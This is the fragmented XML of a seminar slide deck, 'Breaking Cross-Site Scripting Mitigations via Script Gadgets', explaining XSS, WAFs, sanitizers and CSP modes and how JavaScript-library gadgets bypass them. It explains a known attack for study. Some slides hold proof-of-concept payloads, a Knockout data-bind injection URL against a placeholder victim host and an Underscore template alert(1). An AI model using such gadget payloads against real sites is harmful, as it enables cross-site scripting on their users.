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36"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="259" r:id="rId3"/>
    <p:sldId id="272" r:id="rId4"/>
    <p:sldId id="301" r:id="rId5"/>
    <p:sldId id="303" r:id="rId6"/>
    <p:sldId id="265" r:id="rId7"/>
    <p:sldId id="283" r:id="rId8"/>
    <p:sldId id="310" r:id="rId9"/>
    <p:sldId id="268" r:id="rId10"/>
    <p:sldId id="311" r:id="rId11"/>
    <p:sldId id="305" r:id="rId12"/>
    <p:sldId id="284" r:id="rId13"/>
    <p:sldId id="286" r:id="rId14"/>
    <p:sldId id="285" r:id="rId15"/>
    <p:sldId id="290" r:id="rId16"/>
    <p:sldId id="292" r:id="rId17"/>
    <p:sldId id="293" r:id="rId18"/>
    <p:sldId id="294" r:id="rId19"/>
    <p:sldId id="295" r:id="rId20"/>
    <p:sldId id="296" r:id="rId21"/>
    <p:sldId id="307" r:id="rId22"/>
    <p:sldId id="308" r:id="rId23"/>
    <p:sldId id="309" r:id="rId24"/>
    <p:sldId id="300" r:id="rId25"/>
    <p:sldId id="271" r:id="rId26"/>
    <p:sldId id="274" r:id="rId27"/>
    <p:sldId id="282" r:id="rId28"/>
    <p:sldId id="275" r:id="rId29"/>
    <p:sldId id="276" r:id="rId30"/>
    <p:sldId id="277" r:id="rId31"/>
    <p:sldId id="278" r:id="rId32"/>
    <p:sldId id="281" r:id="rId33"/>
    <p:sldId id="280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29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A2185-5739-4056-A17C-404B5D3395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F12ED1-EB5D-42EC-B49D-FDA41DF9194A}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/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HTML</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9AE80A4D-0AF5-451C-8D73-412B782A1E04}" type="parTrans" cxnId="{8DBCDA83-DA29-4F15-9AE0-F40890D050CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C61BC97-4B2D-4D78-BAE6-79E059BC2980}" type="sibTrans" cxnId="{8DBCDA83-DA29-4F15-9AE0-F40890D050CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0CDB0108-F406-433C-B461-819360351A7D}" type="pres">
      <dgm:prSet presAssocID="{B46A2185-5739-4056-A17C-404B5D339519}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{85423891-A46E-43A9-B52C-96F759AA8ABB}" type="pres">
      <dgm:prSet presAssocID="{E7F12ED1-EB5D-42EC-B49D-FDA41DF9194A}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="1" custScaleX="90142" custScaleY="124019" custLinFactNeighborX="-2043" custLinFactNeighborY="-13138">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{BEE9BB19-E242-4E26-A488-DCC582ADCD5A}" type="presOf" srcId="{B46A2185-5739-4056-A17C-404B5D339519}" destId="{0CDB0108-F406-433C-B461-819360351A7D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{E257987C-8227-42D6-AEE8-A54C47EF10A3}" type="presOf" srcId="{E7F12ED1-EB5D-42EC-B49D-FDA41DF9194A}" destId="{85423891-A46E-43A9-B52C-96F759AA8ABB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{8DBCDA83-DA29-4F15-9AE0-F40890D050CB}" srcId="{B46A2185-5739-4056-A17C-404B5D339519}" destId="{E7F12ED1-EB5D-42EC-B49D-FDA41DF9194A}" srcOrd="0" destOrd="0" parTransId="{9AE80A4D-0AF5-451C-8D73-412B782A1E04}" sibTransId="{5C61BC97-4B2D-4D78-BAE6-79E059BC2980}"/>
    <dgm:cxn modelId="{4EDEA5D7-89FC-4851-95FB-3ED79C0F5DB0}" type="presParOf" srcId="{0CDB0108-F406-433C-B461-819360351A7D}" destId="{85423891-A46E-43A9-B52C-96F759AA8AB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23891-A46E-43A9-B52C-96F759AA8ABB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="56503" y="0"/>
          <a:ext cx="1735448" cy="676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HTML</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="394591" y="0"/>
        <a:ext cx="1059272" cy="67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26812-AD3C-4008-96F6-90EA16EB48E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2346F-2CA8-4398-B44A-BB771521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it as short as possible 30 sec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XSS is and what XSS Mitigations are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introducing the Script Gadget concept in the second section </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevalence of Script Gadgets in Modern JS library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4.   Then we go one step further and show the expressiveness of Gadgets at Scale (user land code) – The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>imperical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> study will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scalled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to cover more JS code and study the gadget in real world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5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the slide for 3 seconds while saying its title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study is to measure the prevalence of script gadgets in real world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3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4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5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3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4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talk less than 10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0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a few libraries is easier than fixing all Web sites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Identifying Gadgets in user land code requires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that slide super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ar-SY" dirty="0"/>
              <a:t>الهجوم السابق سهل منعه في حالة وجود ال</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>mitigation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ModSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> : matching rules, regular expressions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sanitizers: JS Library (controller by developers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content Security Policy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the slide for 3 seconds while saying its title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1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the slide for 3 seconds while saying its title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 , how common are gadgets in user land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2346F-2CA8-4398-B44A-BB771521B4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01FB-4116-4216-A3D2-55B85B49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3AECA-8D87-4348-8350-3F4EF362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CFEB-2C42-4453-9440-294E20B8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95B-62E0-4DED-B115-E54E8F6F4B54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5B72-73A2-4FCA-9603-1DFDC4D2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A693-8EB8-4755-B5C3-B277CDB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EF06-EE75-436B-86AC-3BD3420A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5757A-D8E3-4DD9-9B53-7FE9DE5F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5E99-2CA2-4BA3-A369-D740E56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B704-53FC-4D16-8256-931232F37A7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F999-03A3-4E6A-B5A0-DA910B96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847D-2777-43F5-B350-97727DBE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4723-2F2B-49AF-9E32-69712BB9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CADB4-6489-43D8-A595-A78D82DA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C691-A8C2-4CE6-8451-1CCF1351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C4C-EFD9-497F-B0DE-C09DAB0D233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63F5-A8A5-4B69-AEB0-671151A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6196-1E6C-4829-A52F-18A937A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D68D-50DB-4E08-8983-C218362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0528-8566-423F-A35E-E58E447C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B7EE-31C6-44FF-A730-540E69A5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9D27-075D-45EB-B10A-6028DBDF66B0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D15F-9863-4FD2-9014-EE46EB5D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123C-0478-4870-AA88-F4AB90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E01-AFC6-405A-90C3-DA8546BF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2599-5640-4173-9522-8C216D16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828E-8B99-4D20-9F7C-A3244C77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36E2-E142-4D96-9848-E9FEB2B3FAE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2A1E-F447-47C0-9A07-5ADD1A4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AB15-3EB7-4559-92B9-E7A81AD2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2D7-5273-49FA-8DBB-5C457E95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3E81-93E7-4527-B4BE-50AB84534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CD237-7E16-46D4-9131-738D3E61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F4D7-D6AB-4D32-B39B-236B9357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6652-43D2-4578-A194-CF1B890D7462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4FE4-2AB2-4BF1-9AD6-CAAC062D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E9D8-3FA8-4E01-B83F-D017DFA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2494-1827-4EF8-A883-D45E8E69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AB949-BF0E-45AE-B2F2-EB2ECCC8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6DA8-40CD-4B59-ABB6-D7477C88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D0D5C-34F4-421F-8943-26DE96C3B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EAEA-0839-4616-8284-3140D06BC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4D8DA-5140-4408-B9E8-6F9C13BA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FBB-9ABE-4793-B2B0-C302395FCBB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2314F-18E5-4791-AD6D-AF93FD0F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F9841-9986-4304-93A5-8BEAE405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4546-2566-45D3-9EC2-FE91512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BBF4F-1903-42AC-99FA-9B91A23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220-1447-43FB-88DD-A0FA922B4A6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3E13-52C4-4385-8E8E-6293FCD3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43F8C-96F9-49EA-8D01-4330C71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0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C5789-20D6-4713-9995-416201A7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223-182F-4FE9-BBF1-1407EB08502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1C6FB-0A55-4C7E-B329-2362BC0D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A759-B965-4E9E-93F6-F5CA119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B34F-AB04-416B-904F-19C186B8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9536-D2F0-42A3-A47C-496DA1E3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ECA2-9EAF-4874-B81A-4AA14455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0BBB-4AB0-4C58-820F-6DF1BE63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A2AC-21B5-46CF-8781-5AF6CE21558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C66B-28DE-4A1A-A86D-58A7A73E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B77C-0E37-4C5D-81CD-E7202538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A53-D113-4261-A5CA-60AE8A19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BC0B0-9AB2-4758-AE00-DD0CF90E3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CF9A3-3553-4519-BC2B-BAB9F1E5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52EB-E28D-41F3-9F8D-9A750E9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9C42-80F0-42C6-9406-52FF0A568812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8DA2-08F7-492B-BDC3-C185634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34E5-0C8C-42C8-BE62-D7E15651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0B2C2-4163-429D-9AA6-363F3AE5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013C-21D1-400E-8502-3BE727E1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3049-3878-4D15-8CB1-AF7DDEACE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E40B-2496-4F2D-9F4D-735025C4DB9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C72B-0F32-43E1-A7EA-122CB297F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B1DA-CA96-47FD-9128-CFF4FD1D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6C46-BE85-42C4-9173-87317D2CC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2151987"/>
            <a:ext cx="10412361" cy="671006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Breaking Cross-Site Scripting Mitigations via Script Gadgets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0802F-8705-4945-9D72-49A427F3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199" y="3527423"/>
            <a:ext cx="9144000" cy="572583"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Burhan Otour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476A-DD04-4191-89F8-56DA85FF6F4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371145" y="432581"/>
            <a:ext cx="70339" cy="5992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2E7F0-33F1-494A-9B9F-74A7B51D7268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5922257" y="405488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02-02-2018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479A2-F200-4479-87DE-040D6703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64" y="222197"/>
            <a:ext cx="3788823" cy="99456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87412C7-F4EC-4415-BC43-1ECA78317A32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628752" y="2954840"/>
            <a:ext cx="8934496" cy="57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 Light (Headings)"/>
              </a:rPr>
              <a:t>Seminar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739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269-87A5-491F-818F-5F43DFD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703D5-C2AE-4177-ACAE-A38A604DB1FF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44E200-33E0-40FD-A95E-456CA35386E9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71124-2B44-49D7-80CF-AE323DD078A0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 Gadgets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7B49D-BF0B-4F2C-B354-2F7ADB2E0712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A66B0B-38EC-4231-B494-3AABA946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11" y="1603312"/>
            <a:ext cx="10515600" cy="4187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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Legitimate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> JS code that executes as a result of benign HTML markup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 injected </a:t>
            </a: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by the attacker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  The research is on how to use Gadget to bypass XSS mitigations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en-US" sz="20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269-87A5-491F-818F-5F43DFD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703D5-C2AE-4177-ACAE-A38A604DB1FF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44E200-33E0-40FD-A95E-456CA35386E9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71124-2B44-49D7-80CF-AE323DD078A0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Attacker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7B49D-BF0B-4F2C-B354-2F7ADB2E0712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235751-9BFC-453D-B304-D08CBF4A6C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3643154" y="2694039"/>
            <a:ext cx="2020227" cy="14094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XSS flaw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DBDE160-362B-4ED9-A6BE-198735003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131683"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2379408" y="3090912"/>
          <a:ext cx="1927121" cy="67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B7398E3-0191-4A93-8A5E-05C75893877A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5232187" y="3090912"/>
            <a:ext cx="1735448" cy="676176"/>
            <a:chOff x="56503" y="0"/>
            <a:chExt cx="1735448" cy="676176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2864D8DF-B278-4843-8808-A5371411958F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="56503" y="0"/>
              <a:ext cx="1735448" cy="67617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AE5B4BFE-C01C-4894-9DB8-CE8CDE43C116}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394591" y="0"/>
              <a:ext cx="1059272" cy="67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DOM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59096-2EB5-4971-836D-7F6BE92CF80F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3643153" y="2149615"/>
            <a:ext cx="2020227" cy="4454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Mitigation attempt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221279-661C-4CFA-B815-8A7967FC8F3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6770935" y="3090912"/>
            <a:ext cx="1735448" cy="676176"/>
            <a:chOff x="56503" y="0"/>
            <a:chExt cx="1735448" cy="6761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B7C2F2-19CD-4739-ABA7-106B91B405D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="56503" y="0"/>
              <a:ext cx="1735448" cy="676176"/>
            </a:xfrm>
            <a:prstGeom prst="chevron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4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E522921-9A6E-4AE1-8748-2F706BFA542E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394591" y="0"/>
              <a:ext cx="1059272" cy="67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Gadget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230D01-E034-4AD6-B1E2-BE71E42C4788}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8309683" y="3083283"/>
            <a:ext cx="1735448" cy="676176"/>
            <a:chOff x="56503" y="0"/>
            <a:chExt cx="1735448" cy="6761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478D35F5-7C06-4603-8EA7-DFDDDADA998A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="56503" y="0"/>
              <a:ext cx="1735448" cy="676176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AC89845C-3CDF-4F4B-8059-D78E51B60EA8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="394591" y="0"/>
              <a:ext cx="1059272" cy="676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Payload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Graphic spid="13" grpId="0">
        <p:bldAsOne/>
      </p:bldGraphic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4B0E2-1E7A-457B-B4CD-0CF44B002BBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3145513" y="3136612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Script Gadgets in JS libraries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206236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8FFE-7696-45F0-8811-38AE1E19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11" y="1603311"/>
            <a:ext cx="10515600" cy="4890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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are gadgets in modern JS libraries?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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dirty="0"/>
              <a:t>How </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>effective </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are gadgets in bypassing XSS mitigations?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/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To answer this: empirical study on modern JS Frameworks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>AngularJS 1.x, Aurelia, Bootstrap, Closure, Dojo Toolkit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>Emberjs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>, Knockout, Polymer 1.x, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>Ractive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>, React, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>RequireJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>, Underscore, Backbone, Vue.js, jQuery, jQuery Mobile, jQuery UI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Proof-of-concept code: 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US" sz="2400" i="1" u="sng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https://github.com/google/security-research-pocs.git</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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WAFs &amp; XSS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E06395-C343-4621-88BC-5F45982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053"/>
            <a:ext cx="10515600" cy="11008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Finding malicious payloads in requests.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Can detect only specific XSS-related content.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EE1F0F4-8B62-4A4E-AD40-51DF6480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74" y="2790319"/>
            <a:ext cx="880606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"http://victim.example.com/repo/filters/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noscript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knockout.php?inj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data-bind=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value:a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=location&gt;&lt;/div&gt;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data-bind=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value:a.href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=name&gt;&lt;/div&gt;"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javascript:alert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38BBACDF-BD63-43B7-B693-2B5C5358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227" y="4453741"/>
            <a:ext cx="5159477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nonce=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"random"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.applyBindings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71A954-8141-4BF3-A83B-E744FCCE13AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069366" y="2057696"/>
            <a:ext cx="10515600" cy="65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737D0-B671-4CCC-BF71-27ED34B9F69B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612165" y="4653559"/>
            <a:ext cx="2406338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Bypassing NoScript with Knockout gadget</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123208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WAFs &amp; XSS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AF38F-E432-4665-A5CB-DE9237D2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11" y="2100262"/>
            <a:ext cx="9220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HTML sanitizers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1D906-CD09-497C-86E6-D7523812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8" y="1741008"/>
            <a:ext cx="8982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HTML sanitizers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7C57E-523A-4FD2-9D91-7BCB90A8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61" y="2195512"/>
            <a:ext cx="9182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Content Security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7C79C5-1EF4-419B-8945-7358DAB7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560789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CSP: identifies trusted and injected scripts.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Depending on the CSP mode, trusted scripts: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dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Are loaded from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>whitelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> of origins,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dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Are annotated with a secret </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> value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 To make CSP easier to adopt, some keywords added for relaxation.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9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 unsafe-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval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7A295D-2619-4CB8-B06E-B1B688CE0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560789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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>unsafe-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Trusted scripts can call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>() function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Gadgets can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bypass CSP w/unsafe-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eval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, because a lot of gadgets use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eval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().</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri (Body)"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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 Example: Underscore library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BB8AE4-1329-4307-A9C8-2F949C3C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4" y="4601825"/>
            <a:ext cx="662186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underscore/template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 alert(1) %&gt;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273D-515D-458D-A4A0-5221C9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247" y="38173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F7F-AEB2-4561-BC6B-39C45ACC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954" y="1703781"/>
            <a:ext cx="10515600" cy="44712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XSS &amp; XSS Mitigations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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Script Gadget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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Script Gadgets in modern JS libraries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0">
              <a:latin typeface="Calibri (Body)"/>
              <a:cs typeface="Helvetica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en-US" sz="2400" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>Exploring Gadgets at Scale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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Outlook &amp; Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buSzPct val="140000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buSzPct val="14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40000"/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FD3ED-DA8F-4CB2-945B-B459960B195D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2153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 strict-dynamic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A1C82D-E1EE-47D2-84BB-A130033C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295912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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>strict-dynamic:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Trusted scripts can create new (trusted) script elements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Gadgets can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bypass CSP w/strict-dynamic.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000" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Creating new Script elements is a common pattern in JS libraries</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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 Example: jQuery Mobile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D774D52-976B-4020-AF79-D0B1641E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139" y="4345073"/>
